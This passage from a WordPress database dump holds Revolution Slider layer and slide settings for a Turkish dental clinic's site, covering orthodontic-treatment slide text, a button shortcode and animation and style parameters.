\u0131, d\\u00fczg\\u00fcn di\\u015fler ve g\\u00fczel bir <br>g\\u00fcl\\u00fcmseme,   ki\\u015finin kendisini do\\u011fru<br> ifade edebilmesi i\\u00e7in ilk ve   en <br>\\u00f6nemli basamakt\\u0131r. \",\"type\":\"text\",\"left\":{\"desktop\":19,\"notebook\":35},\"top\":{\"desktop\":187,\"notebook\":217},\"align_hor\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"align_vert\":{\"desktop\":\"top\",\"notebook\":\"top\"},\"hiddenunder\":false,\"resizeme\":true,\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"style\":\"\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"width\":392,\"height\":112,\"serial\":2,\"timeLast\":3600,\"alt\":\"\",\"scaleX\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleY\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleProportional\":false,\"attrID\":\"\",\"attrClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"x_start\":\"inherit\",\"x_end\":\"inherit\",\"y_start\":\"50px\",\"y_end\":\"inherit\",\"z_start\":\"inherit\",\"z_end\":\"inherit\",\"x_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_start\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_start\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_y_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"inherit\",\"deformation\":{\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"background-color\":\"transparent\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-align\":\"left\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"text-transform\":\"none\",\"overflow\":\"visible\",\"parallax\":\"5\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"inline\":[],\"deformation-hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"zindex\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"static_styles\":{\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\",\"notebook\":\"rgba(255, 255, 255, 1)\"},\"font-weight\":{\"desktop\":\"300\",\"notebook\":\"300\"},\"font-size\":{\"desktop\":\"25px\",\"notebook\":\"25px\"},\"line-height\":{\"desktop\":\"28px\",\"notebook\":\"28px\"},\"font-family\":\"\\\"Noto Sans\\\"\",\"letter-spacing\":{\"desktop\":\"\",\"notebook\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"internal_class\":\"\",\"hover\":false,\"alias\":\"Exceptional\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"html_tag\":\"h2\",\"mask_start\":false,\"mask_end\":false,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"max_height\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"max_width\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"video_width\":{\"desktop\":\"480px\",\"notebook\":\"480px\"},\"video_height\":{\"desktop\":\"360px\",\"notebook\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\",\"notebook\":\"nowrap\"},\"static_start\":\"1\",\"static_end\":\"last\",\"seo-optimized\":false,\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"cover_mode\":\"custom\",\"x_origin_start\":\"50\",\"y_origin_start\":\"50\",\"x_origin_end\":\"50\",\"y_origin_end\":\"50\",\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"endWithSlide\":false,\"unique_id\":1,\"toggle\":false,\"toggle_use_hover\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"layer-selectable\":\"default\",\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":800.00030517578,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":400,\"animation\":\"sfb\",\"easing\":\"Power4.easeOut\",\"time_relative\":800.00030517578,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870.0003051758,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":300,\"animation\":\"auto\",\"easing\":\"nothing\",\"time_relative\":3670,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"isDemo\":false,\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"layer_blend_mode\":\"normal\",\"force_hover\":true,\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"min_height\":\"40px\",\"display\":\"block\",\"link\":\"\",\"link_open_in\":\"same\",\"css-position\":\"relative\",\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"p_uid\":-1,\"toggle_inverse_content\":false,\"displaymode\":true,\"attrWrapperID\":\"\",\"attrWrapperClasses\":\"\",\"column_break_at\":\"mobile\",\"zIndex\":7,\"positionLeftReset\":90,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"bgimage_url\":\"http:\\/\\/localhost\\/zedent\\/wp-content\\/\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"parallax_layer_ddd_zlevel\":\"front\"},{\"text\":\"[us_btn text=\\\"Bilgi Al\\\" color=\\\"primary\\\" link=\\\"url:\\/hizmetlerimiz\\/ortodonti-dis-teli-tedavisi|||\\\"]\",\"type\":\"text\",\"special_type\":null,\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":1000.0003051758,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":400,\"animation\":\"sfb\",\"easing\":\"Power4.easeOut\",\"time_relative\":1000.0003051758,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870.0003051758,\"delay\":0,\"split\":\"none\",\"splitdelay\":\"10\",\"split_extratime\":0,\"speed\":300,\"animation\":\"auto\",\"easing\":\"nothing\",\"time_relative\":3470,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"unique_id\":3,\"left\":{\"desktop\":21,\"notebook\":37},\"top\":{\"desktop\":309,\"notebook\":353},\"isDemo\":false,\"internal_class\":\"\",\"hover\":false,\"alias\":\"Button 1\",\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"layer_blend_mode\":\"normal\",\"html_tag\":\"div\",\"mask_start\":false,\"mask_end\":false,\"force_hover\":true,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"alt\":\"\",\"max_height\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"min_height\":\"40px\",\"max_width\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"video_width\":{\"desktop\":\"480px\",\"notebook\":\"480px\"},\"video_height\":{\"desktop\":\"360px\",\"notebook\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\",\"notebook\":\"nowrap\"},\"display\":\"block\",\"static_start\":\"1\",\"static_end\":\"last\",\"align_hor\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"align_vert\":{\"desktop\":\"top\",\"notebook\":\"top\"},\"hiddenunder\":false,\"resizeme\":false,\"seo-optimized\":false,\"link\":\"\",\"link_open_in\":\"same\",\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"style\":\"\",\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":false,\"resize-full\":false,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"css-position\":\"relative\",\"width\":691,\"height\":20,\"cover_mode\":\"custom\",\"static_styles\":{\"font-size\":{\"desktop\":\"16px\",\"notebook\":\"16px\"},\"line-height\":{\"desktop\":\"20px\",\"notebook\":\"20px\"},\"font-weight\":{\"desktop\":\"400\",\"notebook\":\"400\"},\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\",\"notebook\":\"rgba(255, 255, 255, 1)\"},\"letter-spacing\":{\"desktop\":\"\",\"notebook\":\"\"}},\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"inherit\",\"notebook\":\"inherit\"},\"x_start\":\"inherit\",\"y_start\":\"50px\",\"z_start\":\"inherit\",\"x_end\":\"inherit\",\"y_end\":\"inherit\",\"z_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"0\",\"x_rotate_start\":\"inherit\",\"y_rotate_start\":\"inherit\",\"z_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_end\":\"inherit\",\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"deformation\":{\"font-family\":\"\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-transform\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0\",\"0\",\"0\",\"0\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"overflow\":\"visible\",\"parallax\":\"5\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"deformation-hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"zindex\":\"auto\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"serial\":3,\"endWithSlide\":false,\"p_uid\":-1,\"toggle\":false,\"toggle_use_hover\":false,\"toggle_inverse_content\":false,\"texttoggle\":\"\",\"scaleX\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleY\":{\"desktop\":\"\",\"notebook\":\"\"},\"autolinebreak\":false,\"displaymode\":true,\"scaleProportional\":false,\"attrID\":\"\",\"attrWrapperID\":\"\",\"attrClasses\":\"\",\"attrWrapperClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"layer-selectable\":\"default\",\"column_break_at\":\"mobile\",\"zIndex\":8,\"positionLeftReset\":110,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"parallax_layer_ddd_zlevel\":\"front\"},{\"text\":\"Di\\u015f Teli Tedavisi\",\"type\":\"text\",\"left\":{\"desktop\":17,\"notebook\":36},\"top\":{\"desktop\":122,\"notebook\":141},\"align_hor\":{\"desktop\":\"left\",\"notebook\":\"left\"},\"align_vert\":{\"desktop\":\"top\",\"notebook\":\"top\"},\"hiddenunder\":false,\"resizeme\":true,\"link_slide\":\"nothing\",\"scrollunder_offset\":\"\",\"style\":\"\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"width\":306,\"height\":60,\"serial\":4,\"timeLast\":3600,\"alt\":\"\",\"scaleX\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleY\":{\"desktop\":\"\",\"notebook\":\"\"},\"scaleProportional\":false,\"attrID\":\"\",\"attrClasses\":\"\",\"attrTitle\":\"\",\"attrRel\":\"\",\"x_start\":\"inherit\",\"x_end\":\"inherit\",\"y_start\":\"50px\",\"y_end\":\"inherit\",\"z_start\":\"inherit\",\"z_end\":\"inherit\",\"x_rotate_start\":\"inherit\",\"x_rotate_end\":\"inherit\",\"y_rotate_start\":\"inherit\",\"y_rotate_end\":\"inherit\",\"z_rotate_start\":\"inherit\",\"z_rotate_end\":\"inherit\",\"scale_x_start\":\"inherit\",\"scale_x_end\":\"inherit\",\"scale_y_start\":\"inherit\",\"scale_y_end\":\"inherit\",\"skew_x_start\":\"inherit\",\"skew_x_end\":\"inherit\",\"skew_y_start\":\"inherit\",\"skew_y_end\":\"inherit\",\"opacity_start\":\"0\",\"opacity_end\":\"inherit\",\"deformation\":{\"font-family\":\"\",\"padding\":[\"0\",\"0\",\"0\",\"0\"],\"background-color\":\"transparent\",\"font-style\":\"normal\",\"text-decoration\":\"none\",\"text-align\":\"left\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"text-transform\":\"none\",\"overflow\":\"visible\",\"parallax\":\"5\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"vertical-align\":\"top\",\"brightnessfilter\":\"100\"},\"inline\":[],\"deformation-hover\":{\"color\":\"rgba(0, 0, 0, 1)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-color\":\"transparent\",\"border-style\":\"none\",\"border-width\":[\"0\",\"0\",\"0\",\"0\"],\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"x\":0,\"y\":0,\"z\":0,\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":0,\"yrotate\":0,\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"speed\":\"0\",\"easing\":\"Linear.easeNone\",\"css_cursor\":\"auto\",\"zindex\":\"auto\",\"blurfilter\":\"0\",\"grayscalefilter\":\"0\",\"brightnessfilter\":\"100\",\"pointer_events\":\"auto\"},\"static_styles\":{\"color\":{\"desktop\":\"rgba(255, 255, 255, 1)\",\"notebook\":\"rgba(255, 255, 255, 1)\"},\"font-weight\":{\"desktop\":\"600\",\"notebook\":\"600\"},\"font-size\":{\"desktop\":\"40px\",\"notebook\":\"40px\"},\"line-height\":{\"desktop\":\"60px\",\"notebook\":\"60px\"},\"font-family\":\"\\\"Noto Sans\\\"\",\"letter-spacing\":{\"desktop\":\"\",\"notebook\":\"\"}},\"subtype\":\"\",\"specialsettings\":[],\"internal_class\":\"\",\"hover\":false,\"alias\":\"Limitless\",\"loop_animation\":\"none\",\"loop_easing\":\"\",\"loop_speed\":\"2\",\"loop_startdeg\":-20,\"loop_enddeg\":20,\"loop_xorigin\":50,\"loop_yorigin\":50,\"loop_xstart\":0,\"loop_xend\":0,\"loop_ystart\":0,\"loop_yend\":0,\"loop_zoomstart\":\"1\",\"loop_zoomend\":\"1\",\"loop_angle\":\"0\",\"loop_radius\":\"10\",\"html_tag\":\"h2\",\"mask_start\":false,\"mask_end\":false,\"x_start_reverse\":false,\"y_start_reverse\":false,\"x_end_reverse\":false,\"y_end_reverse\":false,\"x_rotate_start_reverse\":false,\"y_rotate_start_reverse\":false,\"z_rotate_start_reverse\":false,\"x_rotate_end_reverse\":false,\"y_rotate_end_reverse\":false,\"z_rotate_end_reverse\":false,\"scale_x_start_reverse\":false,\"scale_y_start_reverse\":false,\"scale_x_end_reverse\":false,\"scale_y_end_reverse\":false,\"skew_x_start_reverse\":false,\"skew_y_start_reverse\":false,\"skew_x_end_reverse\":false,\"skew_y_end_reverse\":false,\"mask_x_start_reverse\":false,\"mask_y_start_reverse\":false,\"mask_x_end_reverse\":false,\"mask_y_end_reverse\":false,\"mask_x_start\":\"0\",\"mask_y_start\":\"0\",\"mask_x_end\":\"0\",\"mask_y_end\":\"0\",\"mask_speed_end\":\"inherit\",\"mask_ease_end\":\"inherit\",\"alt_option\":\"media_library\",\"max_height\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"max_width\":{\"desktop\":\"auto\",\"notebook\":\"auto\"},\"video_width\":{\"desktop\":\"480px\",\"notebook\":\"480px\"},\"video_height\":{\"desktop\":\"360px\",\"notebook\":\"360px\"},\"2d_rotation\":0,\"2d_origin_x\":50,\"2d_origin_y\":50,\"whitespace\":{\"desktop\":\"nowrap\",\"notebook\":\"nowrap\"},\"static_start\":\"1\",\"static_end\":\"last\",\"seo-optimized\":false,\"visible-desktop\":true,\"visible-notebook\":true,\"visible-tablet\":true,\"visible-mobile\":true,\"resize-full\":true,\"show-on-hover\":false,\"basealign\":\"grid\",\"responsive_offset\":true,\"lazy-load\":\"auto\",\"image-size\":\"auto\",\"cover_mode\":\"custom\",\"x_origin_start\":\"50\",\"y_origin_start\":\"50\",\"x_origin_end\":\"50\",\"y_origin_end\":\"50\",\"visible\":true,\"animation_overwrite\":\"wait\",\"trigger_memory\":\"keep\",\"endWithSlide\":false,\"unique_id\":7,\"toggle\":false,\"toggle_use_hover\":false,\"texttoggle\":\"\",\"autolinebreak\":false,\"layer-selectable\":\"default\",\"version\":\"530\",\"frames\":{\"frame_0\":{\"time\":600.00030517578,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":400,\"animation\":\"sfb\",\"easing\":\"Power4.easeOut\",\"time_relative\":600.00030517578,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"use_text_c\":false,\"use_bg_c\":false,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"sfx_effect\":\"\"},\"frame_999\":{\"time\":4870.0003051758,\"delay\":0,\"split\":\"none\",\"split_extratime\":0,\"splitdelay\":\"10\",\"speed\":300,\"animation\":\"auto\",\"easing\":\"nothing\",\"time_relative\":3870,\"split_direction\":\"forward\",\"sfxcolor\":\"#ffffff\",\"use_text_c\":false,\"use_bg_c\":false,\"text_c\":\"transparent\",\"bg_c\":\"transparent\",\"sfx_effect\":\"\"}},\"isDemo\":false,\"layer_bg_position\":\"center center\",\"layer_bg_size\":\"cover\",\"layer_bg_repeat\":\"no-repeat\",\"layer_blend_mode\":\"normal\",\"force_hover\":true,\"mask_speed_start\":\"inherit\",\"mask_ease_start\":\"inherit\",\"min_height\":\"40px\",\"display\":\"block\",\"link\":\"\",\"link_open_in\":\"same\",\"css-position\":\"relative\",\"margin\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"padding\":{\"desktop\":[\"0\",\"0\",\"0\",\"0\"],\"notebook\":[\"0\",\"0\",\"0\",\"0\"]},\"text-align\":{\"desktop\":\"center\",\"notebook\":\"center\"},\"pers_start\":\"inherit\",\"pers_end\":\"inherit\",\"svg\":{\"svgstroke-color\":\"transparent\",\"svgstroke-dasharray\":\"0\",\"svgstroke-dashoffset\":\"0\",\"svgstroke-width\":\"0\",\"svgstroke-hover-color\":\"transparent\",\"svgstroke-hover-dasharray\":\"0\",\"svgstroke-hover-dashoffset\":\"0\",\"svgstroke-hover-width\":\"0\"},\"p_uid\":-1,\"toggle_inverse_content\":false,\"displaymode\":true,\"attrWrapperID\":\"\",\"attrWrapperClasses\":\"\",\"column_break_at\":\"mobile\",\"zIndex\":9,\"positionLeftReset\":70,\"addedToStage\":true,\"blurfilter_start\":\"0\",\"blurfilter_end\":\"0\",\"grayscalefilter_start\":\"0\",\"grayscalefilter_end\":\"0\",\"attrTabindex\":\"\",\"link_follow\":\"follow\",\"brightnessfilter_start\":\"100\",\"brightnessfilter_end\":\"100\",\"layer_action\":{\"tooltip_event\":[],\"action\":[],\"image_link\":[],\"link_open_in\":[],\"link_follow\":[],\"jump_to_slide\":[],\"scrollunder_offset\":[],\"action_easing\":[],\"action_speed\":[],\"actioncallback\":[],\"layer_target\":[],\"link_type\":[],\"action_delay\":[],\"toggle_layer_type\":[],\"toggle_class\":[]},\"parallax_layer_ddd_zlevel\":\"front\"}]', '\"\"');
INSERT INTO `zdenl_revslider_slides` (`id`, `slider_id`, `slide_order`, `params`, `layers`, `settings`) VALUES
(4, 1, 2, '{\"background_type\":\"image\",\"image\":\"http:\\/\\/localhost\\/zedent\\/wp-content\\/uploads\\/2018\\/07\\/slider-implant.jpg\",\"title\":\"Slide\",\"state\":\"published\",\"date_from\":\"\",\"date_to\":\"\",\"slide_transition\":[\"parallaxvertical\"],\"0\":\"Remove\",\"slot_amount\":[\"default\"],\"transition_rotation\":[\"0\"],\"transition_duration\":[\"650\"],\"delay\":\"5000\",\"enable_link\":\"false\",\"link_type\":\"regular\",\"link\":\"\",\"link_open_in\":\"same\",\"slide_link\":\"nothing\",\"link_pos\":\"front\",\"slide_thumb\":\"http:\\/\\/localhost\\/zedent\\/wp-content\\/\",\"slide_bg_color\":\"#E7E7E7\",\"slide_bg_external\":\"\",\"bg_fit\":\"cover\",\"bg_fit_x\":\"100\",\"bg_fit_y\":\"100\",\"bg_repeat\":\"no-repeat\",\"bg_position\":\"center center\",\"bg_position_x\":\"0\",\"bg_position_y\":\"0\",\"kenburn_effect\":\"off\",\"kb_start_fit\":\"100\",\"kb_end_fit\":\"100\",\"bg_end_position\":\"left 